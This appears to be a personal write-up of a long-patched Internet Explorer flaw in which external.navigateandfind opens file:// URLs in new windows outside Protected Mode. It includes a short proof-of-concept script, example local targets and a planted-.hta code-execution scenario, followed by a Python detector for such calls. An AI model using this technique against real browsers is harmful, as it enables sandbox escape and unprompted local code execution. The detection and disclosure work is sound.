I was looking at the external object’s less-travelled methods and found that NavigateAndFind with a non-empty third argument opens a new window pointing at any file:// URL — without any popup blocker intervention and without user interaction. Local folders, text files, and executables all opened without a prompt.

<script language="JavaScript">
function navFind(strURL)
{
    external.navigateandfind(strURL,"","NEW_WINDOW");
}
</script>

<!-- Example targets -->
<!-- file:///c:/ - Opens the C:\ folder -->
<!-- file:///c:/windows/system32/drivers/etc/hosts - Opens the hosts file outside Protected Mode -->
<!-- file:///c:/Users/Default/NTUSER.DAT.LOG - Triggers a download dialog and Notepad outside Protected Mode -->

The pop-up blocker does not intercept windows opened this way, and every such window opens outside Protected Mode. The most serious scenario is one where an attacker has already planted a local .hta file: a single click then executes arbitrary code outside the IE sandbox, and IE’s UI gives no clear warning about what is actually running.
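A defender-side check for the pattern described above, added here as an example and not part of the original post: it scans page content for NavigateAndFind calls, treats a non-empty third argument combined with a file:// URL as the high-risk case, and accounts for IE's case-insensitive JScript name lookup and the optional window. prefix. The HTML fragments are constructed samples.

```python
import re

# Constructed sample fragments (not from the original post) used to exercise
# the detector. A non-empty third argument is what made the call open a new
# window in the affected Internet Explorer builds.
SAMPLES = {
    "new_window_file": '<script>external.navigateandfind("file:///c:/", "", "NEW_WINDOW");</script>',
    "window_prefix":   "<script>window.External.NavigateAndFind('file:///c:/windows/system32/drivers/etc/hosts', '', 'x')</script>",
    "same_window":     '<script>external.navigateandfind("file:///c:/", "", "");</script>',
    "http_target":     '<script>external.navigateandfind("http://example.com/", "", "NEW_WINDOW");</script>',
    "unrelated":       '<script>window.open("about:blank");</script>',
}

# IDispatch name lookups in IE's JScript are case-insensitive, so the pattern
# ignores case for the object and method names, allows an optional window.
# prefix, and captures the three quoted string arguments.
_CALL = re.compile(
    r"""(?:window\s*\.\s*)?external\s*\.\s*navigateandfind\s*\(
        \s*(['"])(?P<url>.*?)\1\s*,
        \s*(['"])(?P<find>.*?)\3\s*,
        \s*(['"])(?P<target>.*?)\5\s*\)""",
    re.IGNORECASE | re.VERBOSE,
)

def find_navigateandfind_calls(html):
    """Return one dict per NavigateAndFind call found in the markup."""
    return [
        {
            "url": m.group("url"),
            "target": m.group("target"),
            "new_window": m.group("target") != "",
            "local_file": m.group("url").lower().startswith("file:"),
        }
        for m in _CALL.finditer(html)
    ]

def classify(html):
    """'high' if a call would open a file:// URL in a new window,
    'medium' for any other NavigateAndFind call, otherwise 'none'."""
    calls = find_navigateandfind_calls(html)
    if any(c["new_window"] and c["local_file"] for c in calls):
        return "high"
    return "medium" if calls else "none"

if __name__ == "__main__":
    for name, html in SAMPLES.items():
        print(f"{name:16} -> {classify(html)}")
```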

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.